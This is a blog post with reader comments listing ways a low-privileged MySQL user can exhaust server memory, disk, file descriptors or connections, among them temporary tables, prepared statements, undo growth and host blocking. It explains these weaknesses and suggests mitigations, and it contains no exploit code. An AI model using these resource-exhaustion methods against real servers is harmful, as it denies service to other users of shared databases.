People are sometimes contacting me and asking about bugs like this which provide a trivial way to crash MySQL to the user with basic privileges and asking me what to do.

My answer to them is – there is nothing new to it and they just sit should back and relax 🙂

Really – there are many ways to crash or otherwise made an unavailable server with any MySQL version if you have access to it with normal privileges. We’re constantly helping people to fix mistakes in the applications which make MySQL Server useless (though few of them cause crashes, to be honest) so obviously, it is even easier if you have intent.

In my opinion, MySQL Security should be treated the following way – if you do not allow any access to MySQL Server you are reasonably secure. There were few attacks which did not require valid MySQL account and they have been normally treated very quickly by MySQL. The moment you give someone access to MySQL Server, all MySQL Security guarantees are you can stop one from seeing data you do not want one to see (or change data) but it does ensure you can stop one from overtaking the server.

This will not really change until MySQL Server implements Global Resource Management as otherwise, you can’t really control how much resources a user can take.

You would say resource hog is not a crash? Indeed but it still can make server unavailable plus in many cases, you can use result overload to make MySQL consume so much memory so it will swap badly until it runs out of space and gets killed. In 32bit systems, it was even easier as all you had to do is to get enough memory allocated to get to address space limit and MySQL will crash when one of the internal memory allocations would unexpectedly fail.

To give you a couple of hints:

Temporary Tables You can build a query (with derived tables) which uses as many temporary tables as you like and you can size them so they would be still be created in memory.

Memory Tables If you can create memory tables you can create any number of them and even though there is max_heap_table_size to restrict the size of each table total size is unrestricted. Note you can create tables as TEMPORARY so they would not be easily visible on the file system.

MyISAM Sort Buffer – This one is typically set large as it is assumed only a couple of tables would be repaired at the same time. What if the user uses all 100 of his allowed connections to ALTER 100 different tables? This can be offset by keeping myisam_sort_buffer_size low, but then performance would suffer.

Prepared Statements Number – Happily now there is a limit on the total number of prepared statements (max_stmt_count) which can be created per server, so it is better than it was before when an application which forgot to close prepared statements could easily make server to take up all memory. However, there is no per-user limit so one user can consume all prepared breaking other applications which need prepared statements. Moreover not all prepared statements consume the same amount of memory and by preparing complex prepared statements you can eat a lot of memory. The workaround for this issue is to avoid the use of prepared statements and keep max_prepared_stmt_count very low.

Prepared Statements and Blob Data If you’re want to get memory consumed by the single prepared statement you can create a statement with thousands of placeholders and send data for each of them using mysql_stmt_send_long_data call – Server buffers such data until you have executed the prepared statement.

Innodb Table Cache Leak – Innodb never shrinks its internal table cache (data dictionary) so by creating and accessing a large number of InnoDB tables you can allocate a large amount of memory on the server. The size is typically 4-8K per table though complex tables can require larger sizes, so this is mainly the problem for smaller servers.

Table Cache Merge Tables – Table Cache is allocated in entries and it is normally assumed each entry will use no more than a couple of file descriptors. This is not the case with Merge tables for example – creating and accessing few merge tables with 1000 of subtables will likely cause your MySQL server to run out of file descriptors. The same is true for Partitioned tables in MySQL 5.1

Disk Space For MyISAM tables hosting providers used to use disk quotas for MyISAM tables. You can also use a similar technique with innodb_file_per_table. However you can’t control the growth of InnoDB system tablespace which is used to hold undo data and which you can grow over the roof by opening transaction and doing a lot of updates, or simply keeping the transaction open and allowing other users to do updates – Innodb only can purge data after oldest transactions needing snapshot commits. You can kind of work around this issue by killing transactions which are too old though the proper solution would be implementing some form of limit on undo segment size. Another possibility is to use queries which use large temporary tables or sort files which can take up all space and even if they can be placed on separate partition filling it up will cause other users being unable to run their queries.

Stored Procedures – How much memory can stored procedure allocate? say can you create 1000 variables in the stored procedure and set 1M result set to each of them? I have not experimented with other stored procedure language constructions but I do not think tight memory allocation policy is enforced.

Stored Procedures Cursors – Cursors inside of stored procedures are implemented as temporary tables, so by opening a large number of cursors which are handled as in-memory temporary tables you can consume an unbound amount of memory.

Stored Procedures Recursion – It does not have to be recursion per se – just different stored procedures calling each other. Calls require memory allocation and especially stack memory allocations. There are some protections to ensure you would not run out of stack but they might not cover all cases.

Server Side Variables – Each server-side can hold value up to max_allowed_packet in size (1M by default) but there does not seem to be any limit for server-side variables one can create.

Parse Tree The query is internally presented using parse tree inside MySQL which of course depends on query size which is controlled by max_allowed_packet. However, some MySQL optimizations such as equity propagation and range expansion can cause Parse Tree to blow up in size. For most trivial case it was fixed though I’m not sure if all possibilities were validated.

Session variables There is no restriction on how large you can set per connection variables for an unprivileged user which allows running queries with uncontrolled resource usage.

Host Block You can have given client host blocked from accessing the server by simulating a number of failed connections. This can be avoided by having high max_connect_errors variables but this will obviously disable password brute force protection.

Mutex Saturation Both InnoDB and MyISAM have hotspots and having few connections which use appropriate operations heavily you can reduce system performance beyond being functional.

General Overload As MySQL does not have much of resource utilization control you can simply run heavy queries to get MySQL Server barely functional. The limits which exist are not really helpful as they do not define query complexity and resource consumption allowed for a user. Heavy Disk IO queries can be one of the worse because they would both overload IO system and wipe off both MySQL and OS caches which can cause other users queries to perform an order of magnitude slower than in the normal case.

Some of these come from real experiences others are just my guesses of what could break things.

As you can see from these points it does not looks like MySQL tries to make server bulletproof if somebody tries to break it intentionally – most of the limits, such as max_heap_table_size or max_prepared_stmt_count are designed to protect from typical application mistakes, not from someone intentionally trying to bring MySQL Server down.

Note: I explored only some of the server-side objects – generally one would need to ensure for each and every object there are some global quotas so it can’t consume too much memory and also you can’t get all of it consumed by the single user/single connection.

P.S You would say how this all could be true if there are thousands of virtual hosting companies offering MySQL access. Sure they do and many of them are lucky having users using MySQL lightly and not trying to crash/overtake it. Others constantly have to detect and restrict abusers. This is not to mention many Virtual Hosting companies use old MySQL versions which typically have more issues.

P.P.S
Nothing I write here is security hole which is unknown to MySQL Team. What I’m trying to do is pretty much explain the issue so there are no misunderstandings on how secure is MySQL.

16 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Roland Bouman

Hi Peter,

great post, thanks!

I was wondering though what is meant by:

Server Side Variables
vs
Session variables

I think by “Server Side Variables” you mean “User-defined variables” like

SELECT @myvar:=’myvalue’;

and by “Session variables” you mean a user can do

SET @@session.some_resource_limiting_var := extremely_high_number

?

Piotr Gasidło

I wonder, if MySQL proxy (http://forge.mysql.com/wiki/MySQL_Proxy) could be used to “filter” bad queries. We have huge database mainly used by freehost users – and yesterday – someone have tried (and successfuly managed) to exploit bug #32125 just like it was written in its bug report. This cost us in 1.5 hour of mysql unavailability (exploit was run 3 times, after that mysql starts up in 30 minutes – we have realy HUGE mysql instance). I wonder if full disclosure of critical bugs should be even post to public on bugs.mysql.com before bug will be fixed and patch public available.

Jeremy Cole

Hi Peter,

Pretty good list.

Re. “Host block”, max_connect_errors does not come into play with failed password attempts. As far as I know, MySQL does not have protection against brute force password attempts. The max_connect_errors setting is only taken into account for failed handshakes and network problems.

Check the places that inc_host_errors, there aren’t many (all in sql_parse.cc) and it’s always called as:

inc_host_errors(&thd->remote.sin_addr);
return(ER_HANDSHAKE_ERROR);

Regards,

Jeremy

AlexN

Basically there are two types of “crushing the system”. The first type is something clearly stupid
or malicious – like creating 10000 variables, loading gigabyte BLOBs etc. These problems exist almost
everywhere, and nobody in his right mind would try to implement them. The other type is like doing
something that looks harmless and results in crushed system. The second type is more important.

Jeremy Cole

Hi Peter,

Yes, it’s strange. Aborted_connects has no relation to max_connect_errors. The only place it’s ever checked is in sql/sql_parse.cc:

848 if (!(specialflag & SPECIAL_NO_RESOLVE))
849 {

861 if (connect_errors > max_connect_errors)
862 return(ER_HOST_IS_BLOCKED);
863 }

Where connect_errors comes from:

851 thd->main_security_ctx.host=
852 ip_to_hostname(&thd->remote.sin_addr, &connect_errors);

There are a couple of things to consider with this:
* Since inc_host_errors is never called on password failure, bad password attempts don’t count.
* If you use skip_name_resolve, none of that code is called at all.
* If a host doesn’t have a valid PTR (ip to host mapping), nothing is ever counted.

As you probably know, I’ve been trying to get MySQL to overhaul how it handles hosts for a long time now. My host cache patches are a good start to this:

http://jcole.us/patches/mysql/5.0/host_cache/

Regards,

Jeremy

Jeremy Cole

Actually, to add one further bullet point:

* localhost doesn’t count either, as it’s not really looked up and thus doesn’t have an entry to hostname_cache in order to keep count of errors.

Gleb Pakharenko

There is a famous BENCHMARK() to DOS web-sites 🙂

gigiduru

Given this statement: “Really – there are many ways to crash or otherwise made unavailable server with any MySQL version if you have access to it with normal privileges”, shouldn’t the title be something like “10+ Ways to keep alive MySQL”?

Not to mention, this blog entry would be even shorter than it actually is right now.

Sandeep N Shelke

Peter,
I’m trying to send longtext data of 1GB using prepared statement like
Insert into test(long_text) values (?);

while (chunck_cnt<535000)
{
mysql_stmt_send_long_data(mysql, 0, chunk, 2000);
chunk_cnt++;
}

mysql_stmt_execute(mysql)

The above code never finishes execution.
After debugging and counting the time of execution of mysql_stmt_send_long_data(), I found that this function initially takes 0 microseconds but it grows upto 375000 microsecs for some chunks.

Can you provide any help in this case?

Thanks,

Joshua Perina

I believe I am encountering the Innodb Table Cache Leak problem. Is it possible to release this memory in some way? Will FLUSH TABLES release this memory?

Sudhakar

Hello Peter,
Thanks for the post!!!
My application if often facing the issue with crashing of the tables. I do use the repair table ‘table_name ‘ command every time.
And please help me to understand in following scenarios

1) Should I migrate the mysql to any other sql servers or no need to migrate mysql to other?
2) The crashing of the tables leads to big problem in future. Because I need to take decision quickly as my data is growing day by day.

Thanks,